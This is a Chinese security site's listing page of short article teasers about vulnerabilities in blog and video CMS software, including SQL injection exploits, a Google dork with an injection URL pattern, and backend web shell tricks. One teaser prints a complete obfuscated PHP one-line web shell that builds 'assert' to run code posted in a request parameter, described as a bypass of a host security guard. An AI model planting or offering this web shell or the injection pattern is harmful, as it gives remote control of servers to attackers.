simple-log后台写入缓存漏洞和全局文件读取漏洞

文章由LN撰写。 前段时间做学校的比赛题目,碰到了simple-log博客程序,到了后台需要拿webshell,但是网上的在模板哪儿写入一句话被管理员做了处理,没法直接写入了,但是可以抓包修改,这个不 ...
漏洞情报
4,334

飞飞影视asp版adncms v4.6漏洞分析(转自08sec fans)

前几天公布了飞飞影视php版的SQL注入漏洞。 飞飞影视官方论坛挂上了我们08安全团队的友连,在此感谢! 其实也个版本也算不是一个漏洞,只是利用有些站长懒惰不去修改默认管理员认证码, 结合cookie ...
漏洞情报
7,509

Supernews 2.6.1 sql注入漏洞

...
技术文章
5,074

飞飞影视SQL injection exploit(转自fans web安全吧)

< ? php /** * 飞飞影视管理系统 SQL injection * 飞飞影视系统PHP版 v1.9 injection exploit * by:www.08sec.com fans * ...
漏洞情报
5,861

Doors web 注入漏洞

# Google dork: [inurl:"indice.php?page_id="] #exploit http://target.com.ar/indice.php?page_id=[sq ...
技术文章
3,979

“安全六月”主题活动之检测黑客攻防实验室。

这叫有来有往。 http://www.hoclab.com/bbs       ...
资讯看点
4,702

过护卫神PHP一句话(转)

<?php $a = str_replace(x,”",”axsxxsxexrxxt”); $a($_POST["c"]); ?> ...
技术文章
4,309

近期评论

现在登录